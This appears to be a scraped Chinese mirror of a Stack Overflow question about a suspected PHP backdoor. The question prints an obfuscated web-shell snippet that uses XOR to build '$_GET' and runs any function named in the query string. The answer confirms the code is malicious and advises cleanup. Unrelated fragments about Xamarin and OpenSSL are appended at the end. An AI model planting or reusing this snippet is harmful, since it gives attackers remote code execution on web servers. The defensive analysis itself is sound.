作者热门文章
- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
最佳答案 是的,这是恶意代码。 在花任何时间查看它之前,您应该立即使该站点脱机并-6ren">
您好,我在我的网站文件中发现了这段代码,这是某种后门吗?有人可以逐行解释这段代码吗
<? $_="{";
$_=($_^"<").($_^">").($_^"/");?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
最佳答案
是的,这是恶意代码。
在花任何时间查看它之前,您应该立即使该站点脱机并用已知良好的副本替换它,例如备份或官方版本。您还应该确保您服务器上的所有内容都是最新的并更改您的管理员密码。该代码存在的事实意味着您的代码已经被破坏。
为了确认我没有过于夸张,下面是代码的工作原理:
'GET'
的字符串通过使用 bitwise XOR operations .'_'
一开始,执行$_GET["_"]($_GET["__"]);
, 用 <?=
回应结果_
查询字符串的页面是函数名,__
是它的参数; PHP 将运行该函数并显示结果。但重申一下,以上只是为了满足好奇心;在这种情况下,您应该“先拍摄,然后再提问”。一旦您确定代码不应该存在,假设您已被入侵。
关于php - 那是某种 PHP 后门吗,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/57783589/
我使用 Xamarin Forms(Android) 创建了应用程序。我创建了 xamarin ui 测试项目( Xamarin.UiTest = 1.3.7)。我需要使用后门。这是我的代码: pub
我用“Win32 OpenSSL v1.0.1j Light”工具制作了 5 个“RSA 2048”私钥。(http://slproweb.com/products/Win32OpenSSL.html
我是一名优秀的程序员,十分优秀!